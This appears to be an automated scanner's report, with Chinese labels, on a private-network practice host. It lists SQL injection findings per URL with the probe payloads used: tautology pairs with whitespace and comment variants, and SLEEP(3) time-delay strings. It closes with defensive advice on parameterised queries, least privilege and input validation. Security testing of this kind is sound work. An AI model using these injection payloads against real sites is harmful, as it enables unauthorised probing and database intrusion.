目标：http://192.168.42.133 (GET)

---
URL:http://192.168.42.133/sqli/example2.php (GET)
漏洞名称: blind sqli
Query: {'name': 'root'}
Payload: '	and	'64963'='64963
'	and	'80694'='80694
'	or	88136=88136#
'	and	'2118'='2119
---

---
URL:http://192.168.42.133/sqli/example1.php (GET)
漏洞名称: blind sqli
Query: {'name': 'root'}
Payload: '	and	'64963'='64963
'	and	'80694'='80694
'	or	88136=88136#
'	and	'2118'='2119
---

---
URL:http://192.168.42.133/sqli/example4.php (GET)
漏洞名称: blind sqli
Query: {'id': '2'}
Payload: 	and	30546=30546
	and	29446=29446
	or	85534=85534#
	and	56691=56692
---

---
URL:http://192.168.42.133/sqli/example5.php (GET)
漏洞名称: blind sqli
Query: {'id': '2'}
Payload: 	and	30546=30546
	and	29446=29446
	or	85534=85534#
	and	56691=56692
---

---
URL:http://192.168.42.133/sqli/example3.php (GET)
漏洞名称: blind sqli
Query: {'name': 'root'}
Payload: '/**/and/**/'99427'='99427
'/**/and/**/'18507'='18507
'/**/or/**/38149=38149#
'/**/and/**/'95232'='95233
---

---
URL:http://192.168.42.133/sqli/example6.php (GET)
漏洞名称: blind sqli
Query: {'id': '2'}
Payload: 	and	30546=30546
	and	29446=29446
	or	85534=85534#
	and	56691=56692
---

---
URL:http://192.168.42.133/sqli/example7.php (GET)
漏洞名称: blind sqli
Query: {'id': '2'}
Payload: 
and
767=767

and
49509=49509

or
77926=77926#

and
19734=19735
---

---
URL:http://192.168.42.133/xml/example2.php (GET)
漏洞名称: blind sqli
Query: {'name': 'hacker'}
Payload: '+and+'78427'='78427
'+and+'16396'='16396
'+or+84701=84701#
'+and+'93070'='93071
---

---
URL:http://192.168.42.133/sqli/example8.php (GET)
漏洞名称: time delay sqli vuln
Query: {'order': 'name'}
Payload: ` or SLEEP(3);-- 
---

---
URL:http://192.168.42.133/sqli/example9.php (GET)
漏洞名称: time delay sqli vuln
Query: {'order': 'name'}
Payload:  or SLEEP(3);-- 
---

    防御SQL注入攻击的建议：

    [1] 库或框架

        使用能够防御SQL注入漏洞的库或框架。

    [2] 参数化

        尽量使用自动实施数据和代码之间的分离的结构化机制。
        这些机制也能够自动提供相关引用、编码和验证，而不是依赖于开发者在生成输出的每一处提供此能力。

    [3] 环境固化

        使用完成必要任务所需的最低特权来运行代码。

    [4] 输出编码

        如果在有风险的情况下仍需要使用动态生成的查询字符串或命令，请对参数正确地加引号并将这些参数中的任何特殊字符转义。

    [5] 输入验证

        假定所有输入都是恶意的。
        使用“接受已知善意”输入验证策略：严格遵守规范的可接受输入的白名单。
        拒绝任何没有严格遵守规范的输入，或者将其转换为遵守规范的内容。
        不要完全依赖于通过黑名单检测恶意或格式错误的输入。但是，黑名单可帮助检测潜在攻击，或者确定哪些输入格式不正确，以致应当将其彻底拒绝。

    